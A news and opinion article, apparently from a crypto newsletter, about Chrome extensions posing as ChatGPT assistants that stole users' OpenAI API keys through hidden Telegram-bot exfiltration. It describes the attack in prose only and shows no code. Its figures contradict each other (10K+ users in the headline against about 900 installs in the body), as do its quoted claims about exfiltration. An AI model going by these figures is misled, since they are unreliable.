Chrome Extension Posing as AI Assistant Exposes 10K+ Users’ OpenAI API Keys in Major Security Breach

Another day, another digital heist—only this time, the thieves didn't need to pick a lock. They just asked politely.
Security researchers just uncovered a malicious Chrome extension masquerading as a helpful AI assistant. Its real job? Harvesting OpenAI API keys from over 10,000 unsuspecting users. The extension slipped past Google's defenses, promising productivity while quietly vacuuming up credentials.
How the Scam Worked
The extension presented itself as a legitimate tool, a common sidekick for developers and writers tapping into ChatGPT's power. Once installed, it operated silently in the background. Every time a user authenticated with OpenAI, the extension captured their unique API key—the digital equivalent of a credit card number for AI services—and sent it to a remote server controlled by the attackers.
The Fallout for Users
An exposed API key is a blank check. Attackers can use it to rack up massive bills on the victim's account, potentially costing thousands in unauthorized usage fees. Beyond the financial hit, the keys can be used to access sensitive data from previous interactions or to impersonate the user in other integrated services.
The Bigger Picture: Trust in the Extension Ecosystem
This breach cuts deep because it exploits trust. The Chrome Web Store is a gateway for millions, yet its vetting process failed to catch this wolf in sheep's clothing. It highlights a systemic vulnerability: our reliance on third-party tools to access powerful, paid platforms. Security often becomes an afterthought in the rush for convenience.
OpenAI's response has been standard—revoke compromised keys and advise users to monitor their usage. But the onus remains on the individual to spot fraudulent activity, a classic case of 'privatized profits, socialized risk.' It's the cybersecurity version of a bank telling you to guard your vault with a padlock after they left the front door open.
One cynical finance jab? This is just a more sophisticated version of phishing. Instead of promising a Nigerian prince's fortune, it promised artificial intelligence. The returns, however, were very real for the attackers—funded directly by their victims' APIs. In the crypto world, we call that a rug pull. In the SaaS world, they call it a feature.
The lesson is painfully clear. In the gold rush to integrate AI, basic security hygiene is getting buried. Always vet your extensions, use unique API keys with strict limits, and remember: if a tool is free, you might be the product—or in this case, the funding round.
Chrome extension poses privacy and security risks to OpenAI users
According to Obsidian Security, the software was initially released under the name ChatGPT Extension before being rebranded as H-Chat Assistant. Users who installed the extension were asked to supply their own OpenAI API key to activate chatbot features.
After receiving the key, the extension largely functioned as advertised, enabling conversations with AI models directly in the browser. That apparent legitimacy convinced users to trust the web feature, but according to the security analysis team, there were hidden data flows in the background.
“Although these extensions are not actively exfiltrating API keys, user prompts, and other data are being quietly sent to third-party/external servers. Several of the extensions impersonate ChatGPT, creating a false sense of trust that conversations and data are only being transmitted to OpenAI,” the analysts explained.
However, Obsidian said the actual theft takes place when a user deletes a chat or chooses to log out of the application. At that moment, the key is transmitted using hardcoded Telegram bot credentials embedded in the extension’s code.
H-Chat Assistant was also requesting read and write permissions for Google’s services, which investigators believe could expose data stored in victims’ Google Drive accounts.
Obsidian’s security researchers believe the malicious activity began in July 2024 and went unnoticed for months, while users continued installing and using the tool. On January 13, 2025, they discovered the activity and reported it to OpenAI through disclosure channels.
That same day, OpenAI revoked compromised API keys to cut down the app’s misuse. Even after the disclosure and revocations, the extension was still available in the Chrome Web Store, according to Obsidian’s report.
H-Chat Assistant is part of a malicious toolset
At least 16 Chrome extensions promising AI-related productivity enhancements appear to share the same developer fingerprints. These tools are believed to have been built by a single threat actor who is harvesting credentials and session data.
According to findings cited by researchers, the 16 extensions’ downloads were relatively low, totaling about 900 installations. Still, analysts say the tactic is concerning because of its scalability and the popularity of AI add-ons on browsers.
“GPT Optimizers are popular, and there are enough highly-rated, legitimate ones on the Chrome Web Store that people could easily miss any warning signs. One of the variants has a featured logo that states it follows recommended practices for Chrome extensions,” LayerX Security consultant Natalie Zargarov wrote in a report published on Monday.
Zargarov added that these extensions require a deep integration with authenticated web applications to launch a “materially expanded browser attack surface.” The malicious extensions exploit weaknesses in web-based authentication processes used by ChatGPT-related services.
“Of the 16 identified extensions in this campaign, 15 were distributed through the Chrome Web Store, while one extension was published via the Microsoft Edge Add-ons marketplace,” the researcher explained.
Extension sends metadata and client identifiers, researcher finds
In her analysis, the LayerX consultant found that the extensions were sending more information than just API keys. The extension transmitted extension metadata, including version details, language settings, and client identifiers.
It also sent usage telemetry, event data, and backend-issued access tokens tied to the extension’s services. These combined data points enable attackers to expand token privileges, track users in sessions, and build behavioral profiles.
Zargarov noted that downloads were small compared with GhostPoster, which surpassed 830,000 installations, and Roly Poly VPN, which exceeded 31,000. Still, she cautioned that AI-focused tools could quickly surge in popularity.
“It just takes one iteration for a malicious extension to become popular. We believe that GPT optimizers will soon become as popular as (not more than) VPN extensions,” she wrote.
The smartest crypto minds already read our newsletter. Want in? Join them.